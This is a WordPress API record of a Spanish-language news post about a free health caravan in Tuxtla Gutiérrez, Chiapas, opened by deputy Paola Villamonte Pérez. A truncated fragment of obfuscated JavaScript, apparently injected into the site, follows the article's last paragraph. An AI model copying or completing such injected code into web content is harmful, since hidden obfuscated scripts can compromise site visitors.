{"id":1397,"date":"2022-04-19T02:40:19","date_gmt":"2022-04-19T02:40:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1397"},"modified":"2022-04-19T02:40:21","modified_gmt":"2022-04-19T02:40:21","slug":"habitantes-de-san-jose-teran-reciben-servicios-medicos-de-calidad-villamonte-perez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1397","title":{"rendered":"Habitantes de San Jos\u00e9 Ter\u00e1n, reciben servicios m\u00e9dicos de calidad: Villamonte P\u00e9rez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220418-WA0061-1024x576.jpg\" alt=\"\" class=\"wp-image-1398\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220418-WA0061-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220418-WA0061-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220418-WA0061-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/IMG-20220418-WA0061.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Tuxtla Guti\u00e9rrez, 18 de abril de 2022.- Brindar atenci\u00f3n m\u00e9dica a los sectores vulnerables de Chiapas, forma parte de la agenda de trabajo del presidente de M\u00e9xico, Andr\u00e9s Manuel L\u00f3pez Obrador y del gobernador, Rutilio Escand\u00f3n Cadenas, sostuvo la diputada Paola Villamonte P\u00e9rez, al inaugurar la Caravana de Salud denominada \u201cLa Salud Toca a tu Puerta\u201d, en la colonia San Jos\u00e9 Ter\u00e1n, lo que representa \u201cun compromiso serio por apoyar a la sociedad\u201d.En coordinaci\u00f3n con la Secretar\u00eda de Salud del estado, ISSSTE e ISSTECH, se contin\u00faan realizando acciones por una mejor calidad de vida de los ciudadanos que requieren de la presencia de los m\u00e9dicos y especialistas que hacen el diagn\u00f3stico.Villamonte P\u00e9rez, diputada local por el distrito XIII y presidenta de la Comisi\u00f3n de Atenci\u00f3n a Grupos Vulnerables, puntualiz\u00f3 que esta Caravana de Salud, es resultado del trabajo conjunto entre el Congreso del Estado y la Secretar\u00eda de Salud, quien lleva los servicios de salud de manera integral, de calidad y gratuita en cada rinc\u00f3n de Chiapas, y la muestra est\u00e1 en estas semanas donde se beneficia a hombres y mujeres de Tuxtla.La diputada local, anot\u00f3 que se tiene el respaldo del presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica (JUCOPO) Yamil Melgar Bravo, quien tambi\u00e9n impulsa estas jornadas m\u00e9dicas.Es de mencionar que se ha acudido a colonias como Plan de Ayala, Chiapas Solidario, Democr\u00e1tica, por citar algunas tanto del lado oriente como poniente, anteponiendo uno de los derechos ciudadanos que es la salud y el bienestar de los chiapanecos que carecen de seguridad social; asimismo esta Caravana llegar\u00e1 a la colonia Los P\u00e1jaros los d\u00edas jueves 21 y viernes 22 de abril, como parte de la agenda de la misma.Dentro de los servicios de salud que se est\u00e1n brindando de manera gratuita se encuentran consulta m\u00e9dica general y odontol\u00f3gica, estudios de laboratorio, densitometr\u00eda, ultrasonido obst\u00e9trico, electrocardiogramas, mastograf\u00edas, radiograf\u00edas y medicamentos.Al lugar, asistieron los legisladores Flor Esponda Torres y Felipe Granda Pastrana; \u00d3scar Edgardo Sarmiento Mac\u00edas, encargado del Convoy de Salud; Mar\u00eda De los \u00c1ngeles Camacho, subdirectora del ISSTECH; el agente municipal de San Jos\u00e9 Ter\u00e1n, Oscar R\u00edos; el comisariado ejidal Luis Antonio Chay Jim\u00e9nez; y Jos\u00e9 Ranulfo Esquinca Kobeh, regidor del Ayuntamiento de Tuxtla Guti\u00e9rrez.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, 18 de abril de 2022.- Brindar atenci\u00f3n m\u00e9dica a los sectores vulnerables de Chiapas, forma parte de la agenda de trabajo del presidente de M\u00e9xico, Andr\u00e9s Manuel L\u00f3pez Obrador y del gobernador, Rutilio Escand\u00f3n Cadenas, sostuvo la diputada Paola Villamonte P\u00e9rez, al inaugurar la Caravana de Salud denominada \u201cLa Salud Toca a tu &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1398,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1397","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1397","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1397"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1397\/revisions"}],"predecessor-version":[{"id":1399,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1397\/revisions\/1399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1398"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1397"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1397"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1397"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}